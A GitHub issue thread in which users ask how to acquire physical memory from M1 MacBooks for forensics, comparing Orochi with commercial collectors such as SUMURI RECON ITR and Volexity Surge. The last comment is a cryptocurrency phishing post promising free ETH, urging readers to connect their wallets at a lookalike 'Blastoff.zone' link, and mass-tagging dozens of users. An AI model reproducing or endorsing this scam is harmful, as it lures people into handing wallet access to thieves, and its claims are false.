### ISSUE TITLE
Acquire Physical memory on M1 chip Macbook

### ISSUE THREAD

**Issue by bellohai** [AryaSecLab/Mac-OS-X-Physical-Memory-acquisition-tool#1]
Hello, 

Is there anyway to acquire physical memory on M1 chip Mac Book ?

**Comment by aryanadi-ic** [comment]
Hi there! 
I was told by a senior computer forensic investigator in a whats-app group that he and his team usually uses a tool called orochi (https://github.com/LDO-CERT/orochi) for the memory forensic on mac OS. I haven't been able to successfully install it in my macbook tho becuase my macbook is a Sierra 10.12 with 4gb of memory, and I even can't have docker installed either unfortunately. So in case you'll be able to install it, would you please let me know how you do it?  I'd appreciate it much.

Best and thanks! :-)

**Comment by bellohai** [comment]
Hi there, 

Sorry for late reply. My team have tried out the Orochi that mention by you. But it consider as a memory analysis tool. 
Below are some screenshot for you as a reference: 
![image](https://user-images.githubusercontent.com/49047882/182744248-c0814a42-8287-437a-9764-9236d90b6617.png)

What I am currently looking for is a tool for acquiring Apple chip MacBook's memory file (RAM) which similar to OSXPMem. 

Do you have any idea ?

Thanks !

**Comment by aryanadi-ic** [comment]
Thanks for the update. 
I've been searching for the open source tool for the Apple chip MacBook and for M1 chip but there are unfortunately none of that but only these tools available with purchase: Cellebrite Digital Collector, SUMURI RECON ITR, and Volexity Surge Collect. These 3 tools try to update their products and add support for newer versions of macOS. For example, SUMURI recently announced that RECON now supports macOS Monterey, while Volexity added support for new Macintoshes on the M1 to Surge. 

Cheers! :-)

**Comment by bellohai** [comment]
Hi there, 

I had tried the Sumuri Recon ITR, they said that we can't acquire whole M1 chip MacBook memory file, but we only can collect some volatile data like Ip address, clipboard, logged users, uptime, system profile, running processes, opened files, mounted volume and active networks. 

Thanks.

**Comment by Durantdzr** [comment]
已收到你的信件，我会尽快处理。

**Comment by fiaz-ali** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
ASchmidt1024, @sjimenez77, @randomshana1, @pro-Major, @art-santos, @YingQm, @thethak, @lxz2018, @zjy365, @qinglor, @neuroevolutus, @mchl18, @Shizai-Lin-Bose, @jashmenn, @guitorioadar, @allmaxgit, @brianormous, @EtherTyper, @coderChrisLee, @mtsraposo, @CAfor2015, @lnaie, @nickbouldien, @martinsam16, @aristotll, @ZhenhangTung, @cbrnrd, @sighttviewliu, @NarcoticNarcoleptic, @one909, @hogyun3709, @NilsonKr, @amosyang, @baibaratsky, @vdt, @LukeSamkharadze, @birdca, @saefullohmaslul, @XaviTorello, @suddi, @jjant, @pacokleitz, @Raidus, @mtnsunset, @duggalr2, @greatorangejuice, @xiaostrong, @666lm, @purtyb1tch92, @FoundSol
